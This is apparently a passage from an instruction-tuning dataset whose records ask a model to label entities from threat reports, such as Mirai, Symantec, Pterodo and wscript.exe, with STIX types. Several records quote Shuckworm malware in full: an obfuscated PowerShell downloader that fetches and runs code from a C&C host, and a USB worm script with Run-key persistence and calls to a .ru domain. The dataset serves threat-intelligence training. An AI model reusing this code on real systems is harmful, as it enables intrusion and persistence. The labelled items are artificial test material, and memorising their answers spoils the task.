\"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nNext-Generation Firewall\n\n---\n\n### Text Passage:\nMirai Variant V3G4 Targets IoT Devices\nAdvanced DNS Security Advanced Threat PreventionAdvanced URL FilteringAdvanced WildFireCloud-Delivered Security ServicesIoT SecurityNext-Generation Firewall\nContent Warning\nWe are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nIoT Security\n\n---\n\n### Text Passage:\nMirai Variant V3G4 Targets IoT Devices\nAdvanced DNS Security Advanced Threat PreventionAdvanced URL FilteringAdvanced WildFireCloud-Delivered Security ServicesIoT SecurityNext-Generation Firewall\nContent Warning\nWe are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nMirai\n\n---\n\n### Text Passage:\nMirai Variant V3G4 Targets IoT Devices\nAdvanced DNS Security Advanced Threat PreventionAdvanced URL FilteringAdvanced WildFireCloud-Delivered Security ServicesIoT SecurityNext-Generation Firewall\nContent Warning\nWe are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSymantec\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPterodo\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nwscript.exe\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE 